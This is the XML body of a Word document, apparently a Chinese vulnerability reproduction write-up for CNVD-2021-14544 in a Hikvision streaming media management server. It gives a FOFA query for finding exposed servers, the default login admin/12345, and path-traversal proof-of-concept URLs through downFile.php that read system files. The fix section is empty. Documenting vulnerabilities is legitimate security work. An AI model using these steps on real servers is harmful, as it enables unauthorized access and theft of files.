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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞，攻击者可利用该漏洞获取敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞，攻击者可利用该漏洞登录后台通过文件遍历漏洞获取敏感信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞影响</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>杭州海康威视数字技术股份有限公司 流媒体管理服务器 V2.3.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FOFA：title="流媒体管理服务器"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2564765"/>
            <wp:effectExtent l="0" t="0" r="635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564765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录页面如下， 默认账号密码为 admin/12345</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5215255" cy="1779270"/>
            <wp:effectExtent l="0" t="0" r="1206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11160" r="977"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5215255" cy="1779270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3）进入界面如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5181600" cy="259905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t="8188" r="1616"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5181600" cy="2599055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>POC如下，访问如下Url下载 system.ini文件</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"http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="1727200"/>
            <wp:effectExtent l="0" t="0" r="254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0500" cy="1727200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../Windows/System32/drivers/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2905760"/>
            <wp:effectExtent l="0" t="0" r="762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5420" cy="2905760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>暂无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436F2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="465436F2"/>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A65B9A"/>
    <w:rsid w:val="14870D8D"/>
    <w:rsid w:val="1C66767C"/>
    <w:rsid w:val="42D40D8F"/>
    <w:rsid w:val="445411AA"/>
    <w:rsid w:val="447040E0"/>
    <w:rsid w:val="46E31F30"/>
    <w:rsid w:val="49666300"/>
    <w:rsid w:val="533D4739"/>
    <w:rsid w:val="651C5C62"/>
    <w:rsid w:val="68724955"/>
    <w:rsid w:val="756034B9"/>
    <w:rsid w:val="79C9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2021-04-06T08:45:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-08T03:24:23Z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